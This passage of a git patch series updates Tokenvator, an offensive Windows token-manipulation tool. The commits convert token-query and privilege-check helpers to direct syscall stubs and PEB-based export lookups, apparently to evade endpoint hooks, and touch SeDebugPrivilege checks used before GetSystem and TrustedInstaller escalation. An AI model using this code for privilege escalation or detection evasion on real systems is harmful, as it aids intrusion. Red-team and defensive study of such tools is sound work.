-        ////////////////////////////////////////////////////////////////////////////////
-        /// <summary>
-        /// 
-        /// 
-        /// </summary>
-        /// <param name="tokenInformationClass"></param>
-        /// <returns></returns>
-        ////////////////////////////////////////////////////////////////////////////////
-        [SecurityCritical]
-        [HandleProcessCorruptedStateExceptions]
-        private IntPtr _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS tokenInformationClass)
-        {
-            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-            IntPtr hGetTokenInformation = Generic.GetExportAddress(hadvapi32, "GetTokenInformation");
-            MonkeyWorks.advapi32.GetTokenInformation fGetTokenInformation = (MonkeyWorks.advapi32.GetTokenInformation)Marshal.GetDelegateForFunctionPointer(hGetTokenInformation, typeof(MonkeyWorks.advapi32.GetTokenInformation));
-
-            IntPtr tokenInformation = IntPtr.Zero;
-            try
-            {
-                uint returnLength = 0;
-                fGetTokenInformation(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, out returnLength);
-
-                tokenInformation = Marshal.AllocHGlobal((int)returnLength);
-                if (!fGetTokenInformation(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, out returnLength))
-                {
-                    Misc.GetWin32Error(string.Format("GetTokenInformation ({0}) - Pass 2", tokenInformationClass));
-                    return IntPtr.Zero;
-                }
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine("[-] NtDuplicateToken Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
-                return IntPtr.Zero;
-            }
-
-            return tokenInformation;
-        }
         #endregion
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -650,6 +613,7 @@ public static bool CheckTokenPrivilege(IntPtr hToken, string privilegeName, out
         {
             exists = false;
             enabled = false;
+            
             ////////////////////////////////////////////////////////////////////////////////
             uint TokenInfLength = 0;
             advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, out TokenInfLength);
@@ -668,6 +632,7 @@ public static bool CheckTokenPrivilege(IntPtr hToken, string privilegeName, out
             }
             Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(lpTokenInformation, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
             Marshal.FreeHGlobal(lpTokenInformation);
+            
 
             ////////////////////////////////////////////////////////////////////////////////
             for (int i = 0; i < tokenPrivileges.PrivilegeCount; i++)
@@ -728,33 +693,42 @@ public static bool CheckTokenPrivilege(IntPtr hToken, string privilegeName, out
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Private function to query a token with an enumeration result
+        /// <summary>
+        /// Helper function for GetTokenInformation
+        /// Converted all GetTokenInformation calls to D/Invoke Syscall
+        /// </summary>
+        /// <param name="tokenInformationClass"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        private static bool _QueryTokenInformation(IntPtr hToken, Winnt._TOKEN_INFORMATION_CLASS informationClass, ref int dwTokenInformation)
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        private IntPtr _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS tokenInformationClass)
         {
-            uint tokenInformationLength = (uint)Marshal.SizeOf(typeof(uint));
-            IntPtr lpTokenInformation = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(uint)));
+            IntPtr hNtQueryInformationToken = Generic.GetSyscallStub("NtQueryInformationToken");
+            MonkeyWorks.ntdll.NtQueryInformationToken fSyscallNtQueryInformationToken = (MonkeyWorks.ntdll.NtQueryInformationToken)Marshal.GetDelegateForFunctionPointer(hNtQueryInformationToken, typeof(MonkeyWorks.ntdll.NtQueryInformationToken));
+
+            IntPtr tokenInformation = IntPtr.Zero;
             try
             {
-                uint returnLength = 0;
-                if (!advapi32.GetTokenInformation(hToken, informationClass, lpTokenInformation, tokenInformationLength, out returnLength))
+                ulong returnLength = 0;
+                fSyscallNtQueryInformationToken(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, ref returnLength);
+                tokenInformation = Marshal.AllocHGlobal((int)returnLength);
+
+                uint ntRetVal = fSyscallNtQueryInformationToken(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, ref returnLength);
+                if (0 != ntRetVal)
                 {
-                    Misc.GetWin32Error("GetTokenInformation");
-                    return false;
+                    Misc.GetNtError("NtQueryInformationToken", ntRetVal);
+                    return IntPtr.Zero;
                 }
-                dwTokenInformation = Marshal.ReadInt32(lpTokenInformation);
             }
-            catch(Exception ex)
+            catch (Exception ex)
             {
-                Misc.GetWin32Error("GetTokenInformation");
+                Console.WriteLine("[-] NtDuplicateToken Generated an Exception");
                 Console.WriteLine("[-] {0}", ex.Message);
-                return false;
-            }
-            finally
-            {
-                Marshal.FreeHGlobal(lpTokenInformation);
+                return IntPtr.Zero;
             }
-            return true;
+
+            return tokenInformation;
         }
     }
 }
\ No newline at end of file
diff --git a/Tokenvator/Plugins/Enumeration/UserSessions.cs b/Tokenvator/Plugins/Enumeration/UserSessions.cs
index bf031f5..fc202fc 100644
--- a/Tokenvator/Plugins/Enumeration/UserSessions.cs
+++ b/Tokenvator/Plugins/Enumeration/UserSessions.cs
@@ -235,7 +235,6 @@ internal static void Tasklist()
 
         ////////////////////////////////////////////////////////////////////////////////
         // Finds a process per user discovered
-        // ToDo: check if token is a primary token
         ////////////////////////////////////////////////////////////////////////////////
         public static Dictionary<string, uint> EnumerateTokens(bool findElevation)
         {
@@ -255,9 +254,12 @@ public static Dictionary<string, uint> EnumerateTokens(bool findElevation)
                 kernel32.CloseHandle(hProcess);
                 if (findElevation)
                 {
-                    if (!TokenInformation.CheckElevation(hToken))
+                    using (TokenInformation ti = new TokenInformation(hToken))
                     {
-                        continue;
+                        if (!ti.GetTokenElevation(false))
+                        {
+                            continue;
+                        }
                     }
                 }
 
@@ -352,9 +354,15 @@ public static Dictionary<uint, string> EnumerateUserProcesses(bool findElevation
                 }
                 kernel32.CloseHandle(hProcess);
 
-                if (findElevation && !TokenInformation.CheckElevation(hToken))
+                if (findElevation)
                 {
-                    continue;
+                    using (TokenInformation ti = new TokenInformation(hToken))
+                    { 
+                        if (!ti.GetTokenElevation(false))
+                        {
+                            continue;
+                        }
+                    }
                 }
 
                 uint dwLength = 0;

From 84ccfd5841038822a0b7f86dd767a3062b872c25 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Thu, 26 Aug 2021 10:32:33 -0500
Subject: [PATCH 08/36] GetSystem Named Pipe Bug Fix + Finished
 TokenInformation Conversion

---
 Tokenvator/MainLoop.Modules.cs                |  16 +-
 .../Plugins/AccessTokens/AccessTokens.cs      |  50 +++--
 .../Plugins/AccessTokens/CreateTokens.cs      |  29 ++-
 .../Plugins/AccessTokens/TokenInformation.cs  | 177 +++++++++++-------
 .../Plugins/AccessTokens/TokenManipulation.cs |   6 +-
 Tokenvator/Plugins/Enumeration/DesktopACL.cs  |   9 -
 Tokenvator/Plugins/NamedPipes/NamedPipes.cs   |   5 +-
 7 files changed, 188 insertions(+), 104 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 2c9f135..a6092b8 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -282,7 +282,15 @@ private static void _FindUserProcessesWMI(CommandLineParsing cLP)
         private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
         {
             bool exists, enabled;
-            TokenInformation.CheckTokenPrivilege(hToken, "SeDebugPrivilege", out exists, out enabled);
+            using (TokenInformation ti = new TokenInformation(hToken))
+            {
+                ti.SetWorkingTokenToSelf();
+                if (!ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME, out exists, out enabled))
+                {
+                    Console.WriteLine("[-] Check Token Privilege Failed");
+                    return;
+                }
+            }
 
             if (exists)
             {
@@ -318,7 +326,11 @@ private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
         private static void _GetTrustedInstaller(CommandLineParsing cLP, IntPtr hToken)
         {
             bool exists, enabled;
-            TokenInformation.CheckTokenPrivilege(hToken, "SeDebugPrivilege", out exists, out enabled);
+            using (TokenInformation ti = new TokenInformation(hToken))
+            {
+                ti.SetWorkingTokenToSelf();
+                ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME, out exists, out enabled);
+            }
 
             if (exists)
             {
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index b8d4669..b13d517 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -23,17 +23,19 @@ class AccessTokens : IDisposable
     {
         private bool Disposed = false;
 
-        protected IntPtr phNewToken;
-        protected IntPtr hExistingToken;
-        protected IntPtr currentProcessToken;
+        protected IntPtr phNewToken;// { private get; set; }
+        protected IntPtr hExistingToken;// { private get; set; }
+        protected IntPtr currentProcessToken;// { private get; set; }
 
-        protected IntPtr hWorkingToken;
-        protected IntPtr hWorkingThreadToken;
+        protected IntPtr hWorkingToken { get; private set; }
+        protected IntPtr hWorkingThreadToken { get; private set; }
 
         protected readonly List<uint> threads = new List<uint>();
 
         internal delegate bool Create(IntPtr phNewToken, string newProcess, string arguments);
 
+        private readonly IntPtr hNtClose;
+
         /// <summary>
         /// Default constructor
         /// </summary>
@@ -46,6 +48,8 @@ public AccessTokens(IntPtr currentProcessToken)
 
             hWorkingToken = new IntPtr();
             hWorkingThreadToken = new IntPtr();
+
+            hNtClose = Generic.GetSyscallStub("NtClose");
         }
 
         #region Get/Set
@@ -67,6 +71,15 @@ public void SetWorkingTokenToRemote()
             //Console.WriteLine("[*] Setting Working Token to Remote: 0x{0}", hWorkingToken.ToString("X4"));
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        // Sets hWorkingThreadToken to hExisingThreadToken
+        ////////////////////////////////////////////////////////////////////////////////
+        public void SetWorkingThreadTokenToRemote()
+        {
+            hWorkingThreadToken = hExistingToken;
+            //Console.WriteLine("[*] Setting Working Token to Remote: 0x{0}", hWorkingToken.ToString("X4"));
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         // Sets hWorkingToken to phNewToken
         ////////////////////////////////////////////////////////////////////////////////
@@ -96,12 +109,14 @@ public IntPtr GetWorkingToken()
         }
         #endregion
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Opens a process Token
         /// Converted to Dinvoke Syscalls 
         /// </summary>
         /// <param name="processId"></param>
         /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
         public virtual bool OpenProcessToken(int processId)
@@ -185,12 +200,14 @@ public virtual bool OpenProcessToken(int processId)
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// List all threads for a given process
         /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
         /// </summary>
         /// <param name="processId"></param>
-        /// <returns></returns>
+        /// <returns>Returns true if successful, returns false if an error or exception was generated</returns>
+        ////////////////////////////////////////////////////////////////////////////////
         public bool ListThreads(int processId)
         {
             if (0 == processId)
@@ -257,13 +274,15 @@ public bool ListThreads(int processId)
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Opens a thread token
         /// Converted to D/Invoke Syscalls
         /// </summary>
         /// <param name="threadId"></param>
         /// <param name="permissions"></param>
-        /// <returns></returns>
+        /// <returns>Returns true if successful, returns false if an error or exception was generated</returns>
+        ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
         public bool OpenThreadToken(uint threadId, uint permissions)
@@ -311,7 +330,7 @@ public bool OpenThreadToken(uint threadId, uint permissions)
 
             try
             {
-                ntRetVal = fSyscallNtOpenThreadToken(hThread, permissions, false, ref hWorkingThreadToken);
+                ntRetVal = fSyscallNtOpenThreadToken(hThread, permissions, false, ref hExistingToken);
             }
             catch (Exception ex)
             {
@@ -324,6 +343,8 @@ public bool OpenThreadToken(uint threadId, uint permissions)
                 CloseHandle(hThread);
             }
 
+            SetWorkingThreadTokenToRemote();
+
             if (0 != ntRetVal)
             {
                 //Skip error message if no token exists
@@ -339,12 +360,14 @@ public bool OpenThreadToken(uint threadId, uint permissions)
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Creates a new process with the duplicated token
         /// No conversions required
         /// </summary>
         /// <param name="newProcess"></param>
-        /// <returns></returns>
+        /// <returns>Returns true if successful, returns false if an error or exception was generated</returns>
+        ////////////////////////////////////////////////////////////////////////////////
         public bool StartProcessAsUser(string newProcess)
         {
             Create createProcess;
@@ -472,7 +495,6 @@ public virtual bool ImpersonateUser()
         /// <returns></returns>
         protected bool CloseHandle(IntPtr handle)
         {
-            IntPtr hNtClose = Generic.GetSyscallStub("NtClose");
             MonkeyWorks.ntdll.NtClose fSyscallhNtClose = (MonkeyWorks.ntdll.NtClose)Marshal.GetDelegateForFunctionPointer(hNtClose, typeof(MonkeyWorks.ntdll.NtClose));
             uint ntRetVal = fSyscallhNtClose(handle);
             if (0 != ntRetVal)
@@ -483,9 +505,11 @@ protected bool CloseHandle(IntPtr handle)
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// Default Deconstructor
+        /// Default Deconstructor, disposes if not already disposed
         /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
         ~AccessTokens()
         {
             if (!Disposed)
@@ -494,11 +518,13 @@ protected bool CloseHandle(IntPtr handle)
             }
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Closes all the opened handles
         /// Only Call D/Invoke Syscalls
         /// </summary>
-        public void Dispose()
+        ////////////////////////////////////////////////////////////////////////////////
+        public virtual void Dispose()
         {
             try
             {
diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index 0412860..e004d20 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -232,9 +232,6 @@ public void CloneToken(int processId, string command)
                 return;
             }
 
-            uint LG_INCLUDE_INDIRECT = 0x0001;
-            uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
-
             Console.WriteLine();
             Console.WriteLine("_SECURITY_QUALITY_OF_SERVICE");
             Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
@@ -317,7 +314,17 @@ ref ti.tokenSource
         private bool _CheckPrivileges()
         {
             bool exists, enabled;
-            TokenInformation.CheckTokenPrivilege(hWorkingToken, Winnt.SE_CREATETOKEN_NAME, out exists, out enabled);
+
+            using (TokenInformation ti = new TokenInformation(hWorkingToken))
+            {
+                ti.SetWorkingTokenToSelf();
+                if (!ti.CheckTokenPrivilege(Winnt.SE_CREATETOKEN_NAME, out exists, out enabled))
+                {
+                    Console.WriteLine("[-] Check Token Privilege Failed");
+                    return false;
+                }
+            }
+
             if (!exists)
             {
                 Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_CREATETOKEN_NAME);
@@ -344,7 +351,17 @@ private bool _CheckPrivileges()
                 Console.WriteLine("[+] {0} is present and enabled on the token", Winnt.SE_CREATETOKEN_NAME);
             }
 
-            TokenInformation.CheckTokenPrivilege(hWorkingToken, Winnt.SE_SECURITY_NAME, out exists, out enabled);
+            using (TokenInformation ti = new TokenInformation(hWorkingToken))
+            {
+                ti.SetWorkingTokenToSelf();
+                if (!ti.CheckTokenPrivilege(Winnt.SE_SECURITY_NAME, out exists, out enabled))
+                {
+                    Console.WriteLine("[-] Check Token Privilege Failed");
+                    return false;
+                }
+
+            }
+
             if (!exists)
             {
                 Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_SECURITY_NAME);
@@ -573,7 +590,7 @@ ref globalEotalEntriesRead
             for (int i = 0; i < tokenGroups.GroupCount; i++)
             {
                 string sid, account;
-                TokenInformation._ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
+                TokenInformation.ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
                 Console.WriteLine(" ({0}) {1,-50} {2}", i, sid, account);
             }
 
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index fbe18ab..b4f434a 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -10,7 +10,7 @@
 using Tokenvator.Resources;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.AccessTokens
 {
@@ -29,8 +29,11 @@ class TokenInformation : AccessTokens
         public Winnt._TOKEN_DEFAULT_DACL tokenDefaultDacl;
         public Winnt._TOKEN_DEFAULT_DACL_ACL tokenDefaultDaclAcl;
 
+        private readonly IntPtr hNtQueryInformationToken;
+
         public TokenInformation(IntPtr hToken) : base(hToken)
         {
+            hNtQueryInformationToken = Generic.GetSyscallStub("NtQueryInformationToken");
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -51,7 +54,7 @@ public TokenInformation(IntPtr hToken) : base(hToken)
         /// IDisposable to free the allocated pointers
         /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        public void Dispose()
+        public override void Dispose()
         {
             tiDisposed = true;
 
@@ -246,13 +249,10 @@ public void GetTokenSource()
             try
             {
                 tokenSource = (Winnt._TOKEN_SOURCE)Marshal.PtrToStructure(hTokenSource, typeof(Winnt._TOKEN_SOURCE));
-                if (0 == tokenSource.SourceName.Length)
-                {
-                    Misc.GetWin32Error("PtrToStructure");
-                }
             }
             catch (Exception ex)
             {
+                Console.WriteLine("[-] PtrToStructure Generated an Exception");
                 Console.WriteLine(ex.Message);
                 return;
             }
@@ -281,6 +281,7 @@ public void GetTokenUser()
             }
             catch (Exception ex)
             {
+                Console.WriteLine("[-] PtrToStructure Generated an Exception");
                 Console.WriteLine(ex.Message);
                 return;
             }
@@ -291,7 +292,7 @@ public void GetTokenUser()
             
             Console.WriteLine("[+] User: ");
             string sid, account;
-            _ReadSidAndName(tokenUser.User.Sid, out sid, out account);
+            ReadSidAndName(tokenUser.User.Sid, out sid, out account);
             Console.WriteLine("{0,-50} {1}", sid, account);
             return;
         }
@@ -313,6 +314,7 @@ public bool GetTokenGroups()
             }
             catch (Exception ex)
             {
+                Console.WriteLine("[-] PtrToStructure Generated an Exception");
                 Console.WriteLine(ex.Message);
                 return false;
             }
@@ -326,7 +328,7 @@ public bool GetTokenGroups()
             {
                 string sid, account;
                 sid = account = string.Empty;
-                _ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
+                ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
                 Console.WriteLine("{0,-50} {1}", sid, account);
             }
             return true;
@@ -351,6 +353,7 @@ public void GetTokenPrivileges()
             }
             catch (Exception ex)
             {
+                Console.WriteLine("[-] PtrToStructure Generated an Exception");
                 Console.WriteLine(ex.Message);
                 return;
             }
@@ -482,6 +485,7 @@ public void GetTokenOwner()
             }
             catch (Exception ex)
             {
+                Console.WriteLine("[-] PtrToStructure Generated an Exception");
                 Console.WriteLine(ex.Message);
                 return;
             }
@@ -492,7 +496,7 @@ public void GetTokenOwner()
 
             Console.WriteLine("[+] Owner: ");
             string sid, account;
-            _ReadSidAndName(tokenOwner.Owner, out sid, out account);
+            ReadSidAndName(tokenOwner.Owner, out sid, out account);
             Console.WriteLine("{0,-50} {1}", sid, account);
             return;
         }
@@ -513,6 +517,7 @@ public void GetTokenPrimaryGroup()
             }
             catch (Exception ex)
             {
+                Console.WriteLine("[-] PtrToStructure Generated an Exception");
                 Console.WriteLine(ex.Message);
                 return;
             }
@@ -522,7 +527,7 @@ public void GetTokenPrimaryGroup()
             }
 
             string primaryGroupSid, primaryGroupName;
-            _ReadSidAndName(tokenPrimaryGroup.PrimaryGroup, out primaryGroupSid, out primaryGroupName);
+            ReadSidAndName(tokenPrimaryGroup.PrimaryGroup, out primaryGroupSid, out primaryGroupName);
             Console.WriteLine("[+] Primary Group: ");
             Console.WriteLine("{0,-50} {1}", primaryGroupSid, primaryGroupName);
             return;
@@ -549,6 +554,7 @@ public void GetTokenDefaultDacl()
             }
             catch (Exception ex)
             {
+                Console.WriteLine("[-] PtrToStructure Generated an Exception");
                 Console.WriteLine(ex.Message);
                 return;
             }
@@ -565,21 +571,28 @@ public void GetTokenDefaultDacl()
 
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Converts a pointers to an SID and returns it in its string/sddl form
+        /// advapi32.ConvertSidToStringSid(ref structSid, ref lpSid);
         /// </summary>
         /// <param name="pointer"></param>
         /// <param name="sid"></param>
         /// <param name="account"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        public static void _ReadSidAndName(IntPtr pointer, out string sid, out string account)
+        public static void ReadSidAndName(IntPtr pointer, out string sid, out string account)
         {
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
+            IntPtr hConvertSidToStringSidW = Generic.GetExportAddress(hadvapi32, "ConvertSidToStringSidW");
+            MonkeyWorks.advapi32.ConvertSidToStringSidW fConvertSidToStringSidW = (MonkeyWorks.advapi32.ConvertSidToStringSidW)Marshal.GetDelegateForFunctionPointer(hConvertSidToStringSidW, typeof(MonkeyWorks.advapi32.ConvertSidToStringSidW));
+
             sid = string.Empty;
             account = string.Empty;
             IntPtr lpSid = IntPtr.Zero;
             try
             {
                 Ntifs._SID structSid = (Ntifs._SID)Marshal.PtrToStructure(pointer, typeof(Ntifs._SID));
-                bool retVal = advapi32.ConvertSidToStringSid(ref structSid, ref lpSid);
+
+                bool retVal = fConvertSidToStringSidW(ref structSid, ref lpSid);
                 if (!retVal || IntPtr.Zero == lpSid)
                 {
                     Misc.GetWin32Error("ConvertSidToStringSid");
@@ -593,7 +606,7 @@ public static void _ReadSidAndName(IntPtr pointer, out string sid, out string ac
             }
             finally
             {
-                kernel32.LocalFree(lpSid);
+                Marshal.FreeHGlobal(lpSid);
             }
 
             try
@@ -607,89 +620,112 @@ public static void _ReadSidAndName(IntPtr pointer, out string sid, out string ac
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Checks if a Privilege Exists and is Enabled
+        /// <summary>
+        /// Checks if a Privilege Exists and is Enabled
+        /// Converted to a mix of D/Invoke Syscalls and GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="privilegeName"></param>
+        /// <param name="exists"></param>
+        /// <param name="enabled"></param>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        public static bool CheckTokenPrivilege(IntPtr hToken, string privilegeName, out bool exists, out bool enabled)
+        public bool CheckTokenPrivilege(string privilegeName, out bool exists, out bool enabled)
         {
             exists = false;
             enabled = false;
-            
-            ////////////////////////////////////////////////////////////////////////////////
-            uint TokenInfLength = 0;
-            advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, out TokenInfLength);
-            if (TokenInfLength <= 0 || TokenInfLength > int.MaxValue)
+
+            IntPtr lpTokenInformation = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges);
+
+            if (IntPtr.Zero == lpTokenInformation)
             {
-                Misc.GetWin32Error("GetTokenInformation - 1 " + TokenInfLength);
                 return false;
             }
-            IntPtr lpTokenInformation = Marshal.AllocHGlobal((int)TokenInfLength);
 
-            ////////////////////////////////////////////////////////////////////////////////
-            if (!advapi32.GetTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, lpTokenInformation, TokenInfLength, out TokenInfLength))
+            Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges;
+            try
             {
-                Misc.GetWin32Error("GetTokenInformation - 2 " + TokenInfLength);
+                tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(lpTokenInformation, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] PtrToStructure Generated an Exception");
+                Console.WriteLine(ex.Message);
                 return false;
             }
-            Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(lpTokenInformation, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
-            Marshal.FreeHGlobal(lpTokenInformation);
-            
+            finally
+            {
+                Marshal.FreeHGlobal(lpTokenInformation);
+            }
+
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
 
+            IntPtr hLookupPrivilegeName = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
+            MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeName = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeName, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
+
+            IntPtr hNtPrivilegeCheck = Generic.GetSyscallStub("NtPrivilegeCheck");
+            MonkeyWorks.ntdll.NtPrivilegeCheck fSyscallNtPrivilegeCheck = (MonkeyWorks.ntdll.NtPrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hNtPrivilegeCheck, typeof(MonkeyWorks.ntdll.NtPrivilegeCheck));
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Iterate through each returned privilege to check if it both exists and is enabled
             ////////////////////////////////////////////////////////////////////////////////
             for (int i = 0; i < tokenPrivileges.PrivilegeCount; i++)
             {
-                System.Text.StringBuilder lpName = new System.Text.StringBuilder();
-                int cchName = 0;
+                ////////////////////////////////////////////////////////////////////////////////
+                // Lookup the privilege name based upon the luid returned by GetTokenInformation
+                // advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
+                // advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName);
+                ////////////////////////////////////////////////////////////////////////////////
+
+                StringBuilder lpName = new StringBuilder();
+                uint cchName = 0;
                 IntPtr lpLuid = Marshal.AllocHGlobal(Marshal.SizeOf(tokenPrivileges.Privileges[i]));
                 Marshal.StructureToPtr(tokenPrivileges.Privileges[i].Luid, lpLuid, true);
-                try
+
+                fLookupPrivilegeName(null, lpLuid, null, ref cchName);
+                if (cchName <= 0 || cchName > int.MaxValue)
                 {
-                    advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
-                    if (cchName <= 0 || cchName > int.MaxValue)
-                    {
-                        Misc.GetWin32Error("LookupPrivilegeName Pass 1");
-                        continue;
-                    }
+                    Misc.GetWin32Error("LookupPrivilegeName Pass 1");
+                    continue;
+                }
 
-                    lpName.EnsureCapacity(cchName + 1);
-                    if (!advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName))
-                    {
-                        Misc.GetWin32Error("LookupPrivilegeName Pass 2");
-                        continue;
-                    }
+                lpName.EnsureCapacity((int)cchName + 1);
+                if (!fLookupPrivilegeName(null, lpLuid, lpName, ref cchName))
+                {
+                    Misc.GetWin32Error("LookupPrivilegeName Pass 2");
+                    continue;
+                }
 
-                    if (lpName.ToString() != privilegeName)
-                    {
-                        continue;
-                    }
-                    exists = true;
+                if (lpName.ToString() != privilegeName)
+                {
+                    continue;
+                }
+                exists = true;
 
-                    Winnt._PRIVILEGE_SET privilegeSet = new Winnt._PRIVILEGE_SET
-                    {
-                        PrivilegeCount = 1,
-                        Control = Winnt.PRIVILEGE_SET_ALL_NECESSARY,
-                        Privilege = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
-                    };
+                ////////////////////////////////////////////////////////////////////////////////
+                // Check if the privilege is also enabled on the token
+                // advapi32.PrivilegeCheck(hToken, ref privilegeSet, out pfResult);
+                ////////////////////////////////////////////////////////////////////////////////
 
-                    int pfResult = 0;
-                    if (!advapi32.PrivilegeCheck(hToken, ref privilegeSet, out pfResult))
-                    {
-                        Misc.GetWin32Error("PrivilegeCheck");
-                        continue;
-                    }
-                    enabled = Convert.ToBoolean(pfResult);
-                }
-                catch (Exception ex)
+                Winnt._PRIVILEGE_SET privilegeSet = new Winnt._PRIVILEGE_SET
                 {
-                    Console.WriteLine(ex.Message);
-                    return false;
-                }
-                finally
+                    PrivilegeCount = 1,
+                    Control = Winnt.PRIVILEGE_SET_ALL_NECESSARY,
+                    Privilege = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
+                };
+                int pfResult = 0;
+
+                uint ntRetVal = fSyscallNtPrivilegeCheck(hWorkingToken, ref privilegeSet, ref pfResult);
+
+                if (0 != ntRetVal)
                 {
-                    Marshal.FreeHGlobal(lpLuid);
+                    Misc.GetNtError("PrivilegeCheck", ntRetVal);
+                    continue;
                 }
+                enabled = Convert.ToBoolean(pfResult);
+
             }
             Console.WriteLine();
-            return false;
+            return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -704,7 +740,6 @@ public static bool CheckTokenPrivilege(IntPtr hToken, string privilegeName, out
         [HandleProcessCorruptedStateExceptions]
         private IntPtr _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS tokenInformationClass)
         {
-            IntPtr hNtQueryInformationToken = Generic.GetSyscallStub("NtQueryInformationToken");
